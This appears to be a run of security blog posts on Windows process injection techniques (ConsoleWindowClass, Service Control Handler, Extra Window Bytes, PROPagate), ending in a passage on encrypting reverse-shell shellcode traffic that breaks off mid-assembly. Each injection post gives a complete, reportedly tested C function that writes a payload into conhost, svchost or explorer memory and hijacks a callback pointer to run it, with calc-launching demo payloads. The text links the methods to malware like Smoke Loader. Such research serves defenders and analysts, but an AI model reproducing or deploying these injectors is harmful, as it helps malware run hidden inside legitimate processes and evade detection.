Windows Process Injection: ConsoleWindowClass

Introduction

Every window object has support for User Data that can be set via the SetWindowLongPtr API and GWLP_USERDATA parameter. The User Data of a window is simply a small amount of memory that is normally used for storing a pointer to a class object. In the case of the Console Window Host (conhost) process, it stores the address of a data structure. Contained within the structure is information about the window’s current position on the desktop, its dimensions, an object handle, and of course a class object with methods to control the behaviour of the console window.

The user data in conhost.exe is stored on the heap with writeable permissions. This makes it possible to use for process injection and is very similar to the Extra Bytes method I discussed before.

ConsoleWindowClass

In figure 1, we see the properties of a window object used by a console application. Note how the Window Proc field is empty. The User Data field points to a virtual address, but it does not reside within the console application itself. Rather, the user data structure is in the conhost.exe process spawned by the system when the console application started.

Figure 1 : Virtual address of data structure.

Figure 2 shows the class information of the window and highlighted is the address of a callback procedure responsible for processing window messages.

Figure 2 : Window Procedure to process messages from the operating system.

Debugging conhost.exe

Figure 3 shows a debugger attached to the console host and a dump of the user data value 0x000001CB3836F580. The first 64-bit value points to a virtual table of methods (array of functions).

Figure 3 : User data address.

Figure 4 shows the list of methods stored in the virtual table.

Figure 4 : Virtual table functions.

Before overwriting anything, we need to determine how to trigger execution of these methods from an external application. Setting a “break on access” (ba) for the virtual table, and sending messages to the window should reveal what’s acceptable. Figure 5 shows a breakpoint triggered after sending the WM_SETFOCUS message.

Figure 5 : Break on access of virtual table

Now that we know how to trigger execution, we just need to hijack a method. In this case, GetWindowHandle is called first when processing the WM_SETFOCUS message. Figure 6 show this method does not require any parameters and simply returns a window handle from the user data.

Figure 6 : GetWindowHandle method

The virtual table

The following structure defines the virtual table used by conhost to control the behaviour of the console window. There’s no need to define prototypes for each method unless we intended to use something other than GetWindowHandle which doesn’t take any parameters.

typedef struct _vftable_t {
    ULONG_PTR     EnableBothScrollBars;
    ULONG_PTR     UpdateScrollBar;
    ULONG_PTR     IsInFullscreen;
    ULONG_PTR     SetIsFullscreen;
    ULONG_PTR     SetViewportOrigin;
    ULONG_PTR     SetWindowHasMoved;
    ULONG_PTR     CaptureMouse;
    ULONG_PTR     ReleaseMouse;
    ULONG_PTR     GetWindowHandle;
    ULONG_PTR     SetOwner;
    ULONG_PTR     GetCursorPosition;
    ULONG_PTR     GetClientRectangle;
    ULONG_PTR     MapPoints;
    ULONG_PTR     ConvertScreenToClient;
    ULONG_PTR     SendNotifyBeep;
    ULONG_PTR     PostUpdateScrollBars;
    ULONG_PTR     PostUpdateTitleWithCopy;
    ULONG_PTR     PostUpdateWindowSize;
    ULONG_PTR     UpdateWindowSize;
    ULONG_PTR     UpdateWindowText;
    ULONG_PTR     HorizontalScroll;
    ULONG_PTR     VerticalScroll;
    ULONG_PTR     SignalUia;
    ULONG_PTR     UiaSetTextAreaFocus;
    ULONG_PTR     GetWindowRect;
} ConsoleWindow;

User Data Structure

Figure 7 shows the total size of the user data structure is 104 bytes. Since the allocation has PAGE_READWRITE protection by default, one can simply overwrite the pointer to the virtual table with a duplicate that contains the address of a payload.

Figure 7 : Allocation of data structure.

Full function

This function demonstrates how to replace the virtual table with a duplicate before triggering execution of some code. Tested and working on a 64-bit version of Windows 10.

VOID conhostInject(LPVOID payload, DWORD payloadSize) {
    HWND          hwnd;
    LONG_PTR      udptr;
    DWORD         pid, ppid;
    SIZE_T        wr;
    HANDLE        hp;
    ConsoleWindow cw;
    LPVOID        cs, ds;
    ULONG_PTR     vTable;
    
    // 1. Obtain handle and process id for a console window 
    //   (this assumes one already running)
    hwnd = FindWindow(L"ConsoleWindowClass", NULL);
    
    GetWindowThreadProcessId(hwnd, &ppid);

    // 2. Obtain the process id for the host process 
    pid = conhostId(ppid);
    
    // 3. Open the conhost.exe process
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

    // 4. Allocate RWX memory and copy the payload there
    cs = VirtualAllocEx(hp, NULL, payloadSize, 
      MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    
    // 5. Read the address of current virtual table
    udptr = GetWindowLongPtr(hwnd, GWLP_USERDATA);
    ReadProcessMemory(hp, (LPVOID)udptr, 
        (LPVOID)&vTable, sizeof(ULONG_PTR), &wr);
    
    // 6. Read the current virtual table into local memory
    ReadProcessMemory(hp, (LPVOID)vTable, 
      (LPVOID)&cw, sizeof(ConsoleWindow), &wr);
      
    // 7. Allocate RW memory for the new virtual table
    ds = VirtualAllocEx(hp, NULL, sizeof(ConsoleWindow), 
      MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    // 8. update the local copy of virtual table with 
    //    address of payload and write to remote process
    cw.GetWindowHandle = (ULONG_PTR)cs;
    WriteProcessMemory(hp, ds, &cw, sizeof(ConsoleWindow), &wr); 

    // 9. Update pointer to virtual table in remote process
    WriteProcessMemory(hp, (LPVOID)udptr, &ds, 
      sizeof(ULONG_PTR), &wr); 

    // 10. Trigger execution of the payload
    SendMessage(hwnd, WM_SETFOCUS, 0, 0);

    // 11. Restore pointer to original virtual table
    WriteProcessMemory(hp, (LPVOID)udptr, &vTable, 
      sizeof(ULONG_PTR), &wr);
    
    // 12. Release memory and close handles
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);
    
    CloseHandle(hp);
}

Summary

This is another variation of a “Shatter” attack where window messages and callback functions are misused to execute code without creating a new thread. The approach shown here is limited to console windows or more specifically the “ConsoleWindowClass” object. However, other applications also use GWLP_USERDATA to store a pointer to a class object. A PoC can be found here.

Posted in injection, programming, security, windows | Tagged , | Leave a comment

Windows Process Injection: Service Control Handler

Introduction

This post will show another way to execute code in a remote process without using conventional API. The standard or conventional way to create new threads in a remote process requires using one of the following APIs.

  • CreateRemoteThread
  • RtlCreateUserThread
  • NtCreateThreadEx

This method of injection uses the ControlService API, and thus requires a service for it to work. As some of you may recall, I discussed an approach to stopping the Event logger service by executing the Control Handler remotely. Here, I hijack a pointer to the control handler to execute a payload. To the best of my knowledge, this is a new method that hasn’t been described before.

Demonstration

In figure 1, we can see a list of potential target services shown in process explorer. For this example we’ll use Dhcp hosted by svchost.exe. Any other service should work fine too, but we need to locate the Internal Dispatch Entry (IDE) for the service first and that’s the most difficult part in all this.

Figure 1 : Using the Dhcp service for process injection.

Figure 2 shows the PoC being used to inject a Position Independent Code (PIC) into svchost.exe that will then execute the calculator.

Figure 2 : Injection via Dhcp service.

Figure 3 shows calc.exe running as a child process of the Dhcp host process.

Figure 3 : Calculator running under host process.

Handler prototype

There are two different prototypes for handlers. The first one simply accepts a control code.

VOID Handler(DWORD dwControl)

The second that is more common for Windows based services would be HandlerEx.

DWORD HandlerEx(
  DWORD dwControl,
  DWORD dwEventType,
  LPVOID lpEventData,
  LPVOID lpContext)

In the services I tested, most were using HandlerEx. That said, there might be a way to determine the exact prototype required and avoid crashing the host process if the wrong one is used. Since there are only at most four parameters, it’s possible to escape a crash on 64-bit systems due to the Microsoft fastcall convention that places the first four parameters in registers RCX, RDX, R8 and R9. The same is not true for 32-bit systems that use the stdcall convention and that’s where it really matters.

DWORD HandlerEx(DWORD dwControl, DWORD dwEventType,
  LPVOID lpEventData, LPVOID lpContext)
{
    WinExec_t pWinExec;
    DWORD     szWinExec[2],
              szCalc[2];

    // WinExec
    szWinExec[0]=0x456E6957;
    szWinExec[1]=0x00636578;

    // calc
    szCalc[0] = 0x636C6163;
    szCalc[1] = 0;

    pWinExec = (WinExec_t)xGetProcAddress(szWinExec);
    
    if(pWinExec != NULL) {
      pWinExec((LPSTR)szCalc, SW_SHOW);
    }
    return NO_ERROR;
}

Internal Dispatch Entry

Before one can trigger execution of a payload, one must locate an Internal Dispatch Entry (IDE) that contains information about a service, including the control handler that can be overwritten. The reason it can be overwritten is because it’s stored on the heap. The following structure is undocumented.

typedef struct _INTERNAL_DISPATCH_ENTRY {
    LPWSTR                  ServiceName;
    LPWSTR                  ServiceRealName;
    LPSERVICE_MAIN_FUNCTION ServiceStartRoutine;
    LPHANDLER_FUNCTION_EX   ControlHandler;
    HANDLE                  StatusHandle;
    DWORD                   ServiceFlags;
    DWORD                   Tag;
    HANDLE                  MainThreadHandle;
    DWORD                   dwReserved;
} INTERNAL_DISPATCH_ENTRY, *PINTERNAL_DISPATCH_ENTRY;
  • ServiceName
  • ServiceRealName
  • These fields point to a UNICODE string describing the service. Once the string has been located in memory, it’s used to locate the IDE for the service by comparing these two fields. If they are both equal, we assume we’ve found a valid IDE. Additional checks may be required.

  • ServiceStartRoutine
  • This is the first function called whenever the service starts up, it’s responsible for registering the service control handler.

  • ControlHandler
  • This address will be replaced with the address of a payload before calling the ControlService API.

  • ServiceFlags
  • The control handler dispatcher will check this value to determine what service controls the handler function will accept. To enable code injection, it must be changed to SERVICE_CONTROL_INTERROGATE, otherwise injection fails.

Full function

The bulk of the code involves locating the Internal Dispatch Entry (IDE), and that isn’t included here due to complexity. Once the IDE has been found, injection involves overwriting the ControlHandler pointer with a pointer to the payload, changing the ServiceFlags, writing back to memory and triggering execution via the ControlService API.

VOID CtrlSvc(PSERVICE_ENTRY se, LPVOID payload, DWORD payloadSize) {
    SIZE_T                  wr;
    SC_HANDLE               hm, hs;
    INTERNAL_DISPATCH_ENTRY ide;
    HANDLE                  hp;
    LPVOID                  pl;
    SERVICE_STATUS          ss;
    
    // 1. Open the service control manager
    hm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    
    // 2. Open the target service
    hs = OpenService(hm, se->service, SERVICE_INTERROGATE);
    
    // 3. Open the target process
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, se->pid);
    
    // 4. Allocate RWX memory for payload
    pl = VirtualAllocEx(hp, NULL, payloadSize, 
      MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    
    // 5. Write the payload to the target process
    WriteProcessMemory(hp, pl, payload, payloadSize, &wr);
    
    // 6. Copy the existing entry to local memory
    CopyMemory(&ide, &se->ide, sizeof(ide));
    
    // 7. Update service flags and ControlHandler
    ide.ControlHandler = pl;
    ide.ServiceFlags   = SERVICE_CONTROL_INTERROGATE;
    
    // 8. Write the updated IDE to the target process
    WriteProcessMemory(hp, se->ide_addr, 
      &ide, sizeof(ide), &wr);
    
    // 9. Trigger execution of the payload
    ControlService(hs, SERVICE_CONTROL_INTERROGATE, &ss);
    
    // 10. Restore the original entry
    WriteProcessMemory(hp, se->ide_addr, 
      &se->ide, sizeof(ide), &wr);
    
    // 11. Free memory and close handles
    VirtualFreeEx(hp, pl, payloadSize, 
      MEM_DECOMMIT | MEM_RELEASE);
      
    CloseHandle(hp);          // close process
    CloseServiceHandle(hs);   // close service
    CloseServiceHandle(hm);   // close manager
}

Service to process id

Unfortunately there’s no convenient API that will return a process id for a service name. In the source code, you’ll see an elaborate way that’s not very reliable, so the following code uses Component Object Model (COM) instead as an alternative. This was written in C, so will obviously require something different for C++.

// return a process id for service
DWORD service2pid(PWCHAR targetService) {
    IWbemLocator  *loc = NULL;
    IWbemServices *svc = NULL;
    DWORD         pid  = 0;
    HRESULT       hr;
    
    // initialize COM
    hr = CoInitializeEx (NULL, COINIT_MULTITHREADED);
      
    if (SUCCEEDED(hr)) {
      // setup security
      hr = CoInitializeSecurity(
          NULL, -1, NULL, NULL, 
          RPC_C_AUTHN_LEVEL_DEFAULT, 
          RPC_C_IMP_LEVEL_IMPERSONATE, 
          NULL, EOAC_NONE, NULL);
        
      if (SUCCEEDED(hr)) {
        // create locator
        hr = CoCreateInstance (
          &CLSID_WbemLocator, 
          0, CLSCTX_INPROC_SERVER, 
          &IID_IWbemLocator, (LPVOID*)&loc);
              
        if (SUCCEEDED(hr)) {
          // connect to service
          hr = loc->lpVtbl->ConnectServer(
            loc, L"root\\cimv2", 
            NULL, NULL, NULL, 0, 
            NULL, NULL, &svc);
            
          if (SUCCEEDED(hr)) {
            // get the process id
            pid = GetServicePid(svc, targetService);
            
            // release service object
            svc->lpVtbl->Release(svc);
            svc = NULL;
          }
          // release locator object
          loc->lpVtbl->Release(loc);
          loc = NULL;
        }
      }
      CoUninitialize();
    }
    return pid;
}

The code above will initialize COM, connect to local WMI provider and then pass those parameters to GetServicePid()

DWORD GetServicePid(IWbemServices *svc, PWCHAR targetService) {
    IEnumWbemClassObject *e   = NULL;
    IWbemClassObject     *obj = NULL;
    ULONG                cnt;
    WCHAR                service[MAX_PATH];
    VARIANT              v;
    HRESULT              hr;
    DWORD                pid = 0;
    
    // obtain list of Win32_Service instances
    hr = svc->lpVtbl->CreateInstanceEnum(svc,
        L"Win32_Service", 
        WBEM_FLAG_RETURN_IMMEDIATELY | 
        WBEM_FLAG_FORWARD_ONLY, NULL, &e); 

    if (SUCCEEDED(hr)) {
      // loop through each one
      for (;;) {
        cnt = 0;
        hr  = e->lpVtbl->Next(e, INFINITE, 1, &obj, &cnt);

        if (cnt == 0) break;

        VariantInit (&v);

        // get the name of service
        hr = obj->lpVtbl->Get(obj, L"Name", 0, &v, NULL, NULL);

        if (SUCCEEDED(hr)) {
          // does it match target service name?
          if (lstrcmpi(targetService, V_BSTR(&v)) == 0) {
            // retrieve the process id
            hr = obj->lpVtbl->Get(obj, 
                L"ProcessID", 0, &v, NULL, NULL);
            if (SUCCEEDED(hr)) {
              pid = V_UI4(&v);
              break;
            }
          }
        }
        VariantClear(&v);
        obj->lpVtbl->Release(obj);
      }
      e->lpVtbl->Release(e); 
      e = NULL;
    }
    return pid;
}

The above function will enumerate all instances of Win32_Service WMI class, compare the Name property with our target service name and if equal return the ProcessID property. This is a much better approach that could be used. See sc3.c for an improved version.

Summary

Pretty much any callback function could be misused for process injection. Source code for a PoC that was tested on 64-bit versions of Windows 7 and 10 can be found here.

Posted in injection, programming, security, windows | Tagged , | 1 Comment

Windows Process Injection: Extra Window Bytes

Introduction

This method of injection is famous for being used in the Powerloader malware that surfaced sometime around 2013. Nobody knows for sure when it was first used for process injection because the feature exploited has been part of the Windows operating system since the late 80s or early 90s. Index zero of the Extra Window Bytes can be used to associate a class object with a window. A pointer to a class object is stored at index zero using SetWindowLongPtr and one can be retrieved using GetWindowLongPtr. The first mention of using “Shell_TrayWnd” as an injection vector can be traced to a post on the WASM forum by a user called “Indy(Clerk)”. There was some discussion about it there around 2009.

Figure 1 shows information for the “Shell_TrayWnd” class where you can see index zero of the Window Bytes has a value set.

Figure 1 : Window Spy++ information for Shell_TrayWnd

Windows Spy++ doesn’t show the full 64-bit value here, but is shown in figure 2, which displays the value returned by GetWindowLongPtr API for the same window.

Figure 2 : Full address of CTray object

CTray class

There are only three methods in this class and no properties. The pointers to each method are read-only so we can’t simply overwrite the pointer to WndProc with a pointer to a payload. We can construct the object manually, but I think a better approach is to copy the existing object to local memory, overwrite WndProc and write the object to a new location in explorer memory. The following structure is used to define the object and pointer.

// CTray object for Shell_TrayWnd
typedef struct _ctray_vtable {
    ULONG_PTR vTable;    // change to remote memory address
    ULONG_PTR AddRef;
    ULONG_PTR Release;
    ULONG_PTR WndProc;   // window procedure (change to payload)
} CTray;

The above structure contains everything necessary to replace the CTray object on both 32 and 64-bit systems. The size of ULONG_PTR is 4-bytes on 32-bit systems and 8-bytes on 64-bit.

Payload

The main difference between this and the code used for PROPagate is the function prototype. If we didn’t release the same number of parameters when returning to the caller, we run the risk of crashing Windows explorer or whatever window that has a class associated with it.

LRESULT CALLBACK WndProc(HWND hWnd, UINT uMsg, 
  WPARAM wParam, LPARAM lParam)
{
    // ignore messages other than WM_CLOSE
    if (uMsg != WM_CLOSE) return 0;
    
    WinExec_t pWinExec;
    DWORD     szWinExec[2],
              szCalc[2];

    // WinExec
    szWinExec[0]=0x456E6957;
    szWinExec[1]=0x00636578;

    // calc
    szCalc[0] = 0x636C6163;
    szCalc[1] = 0;

    pWinExec = (WinExec_t)xGetProcAddress(szWinExec);
    if(pWinExec != NULL) {
      pWinExec((LPSTR)szCalc, SW_SHOW);
    }
    return 0;
}

Full function

So here’s the function to perform the injection when provided a Position Independent Code (PIC). As with all these examples, I omit error checking to help visualize the process in steps.

LPVOID ewm(LPVOID payload, DWORD payloadSize){
    LPVOID    cs, ds;
    CTray     ct;
    ULONG_PTR ctp;
    HWND      hw;
    HANDLE    hp;
    DWORD     pid;
    SIZE_T    wr;
    
    // 1. Obtain a handle for the shell tray window
    hw = FindWindow("Shell_TrayWnd", NULL);

    // 2. Obtain a process id for explorer.exe
    GetWindowThreadProcessId(hw, &pid);
    
    // 3. Open explorer.exe
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    
    // 4. Obtain pointer to the current CTray object
    ctp = GetWindowLongPtr(hw, 0);
    
    // 5. Read address of the current CTray object
    ReadProcessMemory(hp, (LPVOID)ctp, 
        (LPVOID)&ct.vTable, sizeof(ULONG_PTR), &wr);
    
    // 6. Read three addresses from the virtual table
    ReadProcessMemory(hp, (LPVOID)ct.vTable, 
      (LPVOID)&ct.AddRef, sizeof(ULONG_PTR) * 3, &wr);
    
    // 7. Allocate RWX memory for code
    cs = VirtualAllocEx(hp, NULL, payloadSize, 
      MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    
    // 8. Copy the code to target process
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    
    // 9. Allocate RW memory for the new CTray object
    ds = VirtualAllocEx(hp, NULL, sizeof(ct), 
      MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    
    // 10. Write the new CTray object to remote memory
    ct.vTable  = (ULONG_PTR)ds + sizeof(ULONG_PTR);
    ct.WndProc = (ULONG_PTR)cs;
    
    WriteProcessMemory(hp, ds, &ct, sizeof(ct), &wr); 

    // 11. Set the new pointer to CTray object
    SetWindowLongPtr(hw, 0, (ULONG_PTR)ds);
    
    // 12. Trigger the payload via a windows message
    PostMessage(hw, WM_CLOSE, 0, 0);
    
    // 13. Restore the original CTray object
    SetWindowLongPtr(hw, 0, ctp);

    // 14. Release memory and close handles
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);

    CloseHandle(hp);
}

Summary

Injection methods like this against window objects usually fall under the category of “Shatter” attacks. Despite the mitigations provided by User Interface Privilege Isolation (UIPI) introduced with the release of Windows Vista, this method of injection continues to work fine on the latest build of Windows 10. You can view source code here with a payload that executes calculator.

Posted in injection, malware, programming, windows | Tagged , , | 1 Comment

Windows Process Injection: PROPagate

Introduction

In October 2017, Adam at Hexacorn published details of a process injection technique called PROPagate. In his post, he describes how any process that uses subclassed windows has the potential to be used for the execution of code without the creation of a new thread. As some of you will already know, creating a new thread in a remote process indicates suspicious activity. Remote thread creation is a common behaviour of malware attempting to deploy itself inside the memory space of a legitimate process for the purpose of evading detection.

PROPagate works by way of inserting a new subclass header or modifying an existing one that contains among other information a callback function that can be controlled from another process. A subclassed window can be updated using the SetProp API, and is very similar to using SetWindowLong/SetWindowLongPtr APIs to update a windows callback procedure. In this post, we will examine how PROPagate works, and what makes it more appealing for threat actors to use over other injection methods. As of August 2018, the method has been so far detected in Smoke Loader and the RIG Exploit Kit.

Enumerating windows

Windows Explorer uses subclassing extensively, and normally runs with a medium integrity level that makes the process space accessible to the logged on user without any privileges enabled. For these reasons, Windows explorer is far more likely to be the target of this injection method. A threat actor still needs to locate a valid subclass header, and thus requires discovery of existing window objects and their properties before injection into windows explorer can occur.

Microsoft Windows provides a number of simple API that can be used to discover window objects. We have the following API available to us.

  • EnumWindows/EnumDesktopWindows
  • EnumChildWindows
  • EnumProps/EnumPropsEx

We can locate a valid subclass header in explorer.exe using the following steps:

  1. Invoke EnumWindows
  2. From EnumWindowsProc invoke EnumChildWindows
  3. From EnumChildWindowsProc invoke EnumProps
  4. From EnumPropsProc invoke GetProp on the window handle with “UxSubclassInfo”
  5. If a valid handle is returned by GetProp, consider it a potential vector for injection

The following snippet of code is taken from enumprop that simply gathers a list of subclassed windows and displays information about them in a console window.

typedef struct _win_props_t {
  DWORD  dwPid;
  WCHAR  ImageName[MAX_PATH];
  HANDLE hProperty;
  HWND   hParentWnd;
  HWND   hChildWnd;
  WCHAR  ParentClassName[MAX_PATH];
  WCHAR  ChildClassName[MAX_PATH];
} WINPROPS, *PWINPROPS;

// callback for property list
BOOL CALLBACK PropEnumProc(HWND hwnd, 
  LPCTSTR lpszString, HANDLE hData) 
{
    WINPROPS wp;
    HANDLE   hp;
    
    hp = GetProp(hwnd, L"UxSubclassInfo");
    if(hp==NULL) hp = GetProp(hwnd, L"CC32SubclassInfo");
    
    if(hp != NULL) {
      ZeroMemory(&wp, sizeof(wp));
      
      GetWindowThreadProcessId(hwnd, &wp.dwPid);
      
      wp.hProperty  = hp;
      wp.hChildWnd  = hwnd;
      wp.hParentWnd = GetParent(hwnd);
      
      GetClassName(wp.hParentWnd, wp.ParentClassName, MAX_PATH);
      GetClassName(hwnd, wp.ChildClassName, MAX_PATH); 
      GetProcessImageName(wp.dwPid, wp.ImageName, MAX_PATH);
      
      // if not already saved
      if(!IsEntry(&wp)) {
        windows.push_back(wp);
      }
    }
    return TRUE;
}

// callback for child windows
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam) {
    EnumProps(hwnd, PropEnumProc);
    
    return TRUE;
}

// callback for parent windows
BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam) {
    EnumChildWindows(hwnd, EnumChildProc, 0);
    EnumProps(hwnd, PropEnumProc);
    
    return TRUE;
}

The following screenshot is an example of output generated by enumprop on a 64-bit version of Windows 7.

As you can see, there are many potential classes that could be exploited for code execution, however, we should really only need to use one of those listed. A universal parent and child class that should work for both Windows 7 and 10 is “Progman” and “SHELLDLL_DefView”

Subclass header

The sub class header values shown in the screenshot are just virtual memory addresses inside the process space of Windows explorer.

Windows keeps track of callback procedures for sub-classed windows through a set of structures defined below. The CallArray field is what we are interested in because this is where one can store a pointer to a payload in memory. Modifying the original header that was found through discovery is not required. One can simply copy the original header to a new memory location, update the CallArray field with a pointer to the payload in memory and trigger execution of the payload via a windows message.

typedef struct _SUBCLASS_CALL {
  SUBCLASSPROC pfnSubclass;    // subclass procedure
  WPARAM       uIdSubclass;    // unique subclass identifier
  DWORD_PTR    dwRefData;      // optional ref data
} SUBCLASS_CALL, PSUBCLASS_CALL;

typedef struct _SUBCLASS_FRAME {
  UINT                    uCallIndex;   // index of next callback to call
  UINT                    uDeepestCall; // deepest uCallIndex on stack
  struct _SUBCLASS_FRAME  *pFramePrev;  // previous subclass frame pointer
  struct _SUBCLASS_HEADER *pHeader;     // header associated with this frame
} SUBCLASS_FRAME, PSUBCLASS_FRAME;

typedef struct _SUBCLASS_HEADER {
  UINT           uRefs;        // subclass count
  UINT           uAlloc;       // allocated subclass call nodes
  UINT           uCleanup;     // index of call node to clean up
  DWORD          dwThreadId;   // thread id of window we are hooking
  SUBCLASS_FRAME *pFrameCur;   // current subclass frame pointer
  SUBCLASS_CALL  CallArray[1]; // base of packed call node array
} SUBCLASS_HEADER, *PSUBCLASS_HEADER;

Subclass callback

The function prototype for any payload should match the callback function we are replacing, otherwise the host process might crash after execution completes. It depends on the calling convention and number of parameters passed to the callback function.

typedef LRESULT (CALLBACK *SUBCLASSPROC)(
   HWND      hWnd,
   UINT      uMsg,
   WPARAM    wParam,
   LPARAM    lParam,
   UINT_PTR  uIdSubclass,
   DWORD_PTR dwRefData);

The payload requires the same number of parameters and calling convention. In addition to this, if we don’t want the function called multiple times, we should only execute based on the windows message passed in. Here, I use WM_CLOSE, but the message itself is irrelevant because it is never processed. It’s merely a way of knowing if this is the first call to the function.

LRESULT CALLBACK SubclassProc(HWND hWnd, UINT uMsg, WPARAM wParam, 
  LPARAM lParam, UINT_PTR uIdSubclass, DWORD_PTR dwRefData)
{
    // ignore messages other than WM_CLOSE
    if (uMsg != WM_CLOSE) return 0;
    
    WinExec_t pWinExec;
    DWORD     szWinExec[2],
              szCalc[2];

    // WinExec
    szWinExec[0]=0x456E6957;
    szWinExec[1]=0x00636578;

    // calc
    szCalc[0] = 0x636C6163;
    szCalc[1] = 0;

    pWinExec = (WinExec_t)xGetProcAddress(szWinExec);
    if(pWinExec != NULL) {
      pWinExec((LPSTR)szCalc, SW_SHOW);
    }
    return 0;
}

Smoke Loader in particular appears to use a combination of WM_NOTIFY and WM_PAINT to trigger the payload, but this isn’t necessary and likely results in the code being executed multiple times. If it’s not executed multiple times, then I can only assume it uses a mutex name or something else to prevent this.

Full function

Below is the full code to inject a Position Independent Code (PIC) into explorer.exe. It works for both Windows 7 and 10, but performs no error checking so it may cause explorer.exe to crash or some other unexpected behaviour.

VOID propagate(LPVOID payload, DWORD payloadSize) {
    HANDLE          hp, p;
    DWORD           id;
    HWND            pwh, cwh;
    SUBCLASS_HEADER sh;
    LPVOID          psh, pfnSubclass;
    SIZE_T          rd,wr;

    // 1. Obtain the parent window handle
    pwh = FindWindow(L"Progman", NULL);

    // 2. Obtain the child window handle
    cwh = FindWindowEx(pwh, NULL, L"SHELLDLL_DefView", NULL);

    // 3. Obtain the handle of subclass header
    p = GetProp(cwh, L"UxSubclassInfo");

    // 4. Obtain the process id for the explorer.exe
    GetWindowThreadProcessId(cwh, &id);

    // 5. Open explorer.exe
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

    // 6. Read the contents of current subclass header
    ReadProcessMemory(hp, (LPVOID)p, &sh, sizeof(sh), &rd);

    // 7. Allocate RW memory for a new subclass header
    psh = VirtualAllocEx(hp, NULL, sizeof(sh),
        MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

    // 8. Allocate RWX memory for the payload
    pfnSubclass = VirtualAllocEx(hp, NULL, payloadSize,
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    // 9. Write the payload to memory
    WriteProcessMemory(hp, pfnSubclass,
        payload, payloadSize, &wr);

    // 10. Set the pfnSubclass field to payload address, and write
    //    back to process in new area of memory
    sh.CallArray[0].pfnSubclass = (SUBCLASSPROC)pfnSubclass;
    WriteProcessMemory(hp, psh, &sh, sizeof(sh), &wr);

    // 11. update the subclass procedure with SetProp
    SetProp(cwh, L"UxSubclassInfo", psh);

    // 12. Trigger the payload via a windows message
    PostMessage(cwh, WM_CLOSE, 0, 0);

    // 13. Restore original subclass header
    SetProp(cwh, L"UxSubclassInfo", p);

    // 14. free memory and close handles
    VirtualFreeEx(hp, psh, 0, MEM_DECOMMIT | MEM_RELEASE);
    VirtualFreeEx(hp, pfnSubclass, 0, MEM_DECOMMIT | MEM_RELEASE);

    CloseHandle(hp);
}

Summary

Not all processes will have a subclassed window, so this method of injection is for the most part isolated to explorer.exe. A PoC that executes calculator can be found here.

Posted in injection, malware, security, windows | Tagged , | Leave a comment

Shellcode: Encrypting traffic

Introduction

This will be a quick post on using encryption in a Position Independent Code (PIC) that communicates over TCP. I’ll be using the synchronous shells for Linux as examples, so just to recap, read the following posts for more details about the shellcodes.

You may also wish to look at some of the encryption algorithms mentioned here.

Disclaimer

I’m neither a cryptographer nor engineer, so what I use in these shellcodes to encrypt TCP traffic should not be used to protect data (obviously).

Protocols and libraries

When we think about cryptographic protocols, our first thought might be Transport Layer Security (TLS), because it’s the industry standard for browsing the web securely. One might also consider Secure Shell (SSH) or Internet Protocol Security (IPSec). However, none of these protocols are suitable for resource constrained environments due to the underlying algorithms used. Cryptographic hash functions like SHA-2 and block ciphers like Blowfish were never designed for low resource electronic devices such as Radio-frequency identification (RFID) chips.

In April 2018, NIST initiated a process to standardize lightweight cryptographic algorithms for the IoT industry. This process will take several years to complete, but of course the industry will not wait before then and this will inevitably lead to insecure products being exposed to the internet. Some cryptographers took the initiative and proposed their own protocols using existing algorithms suitable for low resource devices, two of which are BLINKER and STROBE. Libraries suitable for resource constrained environments are LibHydrogen and MonoCypher

Block ciphers

There are many block ciphers, but the 128-bit version of the Advanced Encryption Standard (AES) in Galois Counter Mode (GCM) is probably the most popular for protecting online traffic. Even though AES-128 can be implemented in 205 bytes of x86 assembly, there are alternatives that might be more ideal for a shellcode. The following table lists a number of block ciphers that were examined. They are in no particular order.

Cipher Block (bits) Key (bits) x86 assembly (bytes)
Speck 64 128 64
XTEA 64 128 72
Chaskey 128 128 89
CHAM 128 128 128
SIMECK 64 128 97
RoadRunneR 64 128 142
AES 128 128 205
RC5 64 128 120
RC6 128 256 168
NOEKEON 128 128 152
LEA 128 128 136

There’s a good selection of ciphers there, but they still require a mode of encryption like Counter (CTR) and authentication. The most suitable Message Authentication Code (MAC) is LightMAC because it can use the same block cipher used for encryption.

Stream ciphers

Another popular combination of algorithms for authenticated encryption as an alternative to AES-GCM is ChaCha20 and Poly1305, but an implementation of ChaCha20 is ~200 bytes while Poly1305 is ~330 bytes. Although Poly1305 is more compact than HMAC-SHA2, it’s still too much.

Permutation functions

If you spend enough time examining various cryptographic algorithms, you eventually realize a cryptographic permutation function is all that’s required to construct stream ciphers, block ciphers, authenticated modes of encryption, cryptographic hash functions and random number generators. The following table lists three functions that were examined.

Function State (bits) x86 assembly (bytes)
Gimli 384 112
Xoodoo 384 186
Keccak-f[200,18] 200 210

From this, Gimli was selected to be used for encryption, simply because it was the smallest of the three and can be used to construct everything required to encrypt traffic.

XOR Cipher

Just for fun, let’s implement a simple XOR operation of the data stream. Below is a screenshot of some commands sent from a windows VM to a Linux VM running the shellcode without any encryption.

Capturing the traffic between the two hosts, we see the following in the TCP stream.

Add a small bit of code to the x86 assembly shellcode to perform an 8-bit XOR operation.

;
      ; read(r, buf, BUFSIZ, 0);
      xor    esi, esi          ; esi = 0
      mov    ecx, edi          ; ecx = buf
      cdq                      ; edx = 0
      mov    dl, BUFSIZ        ; edx = BUFSIZ
      push   SYS_read          ; eax = SYS_read
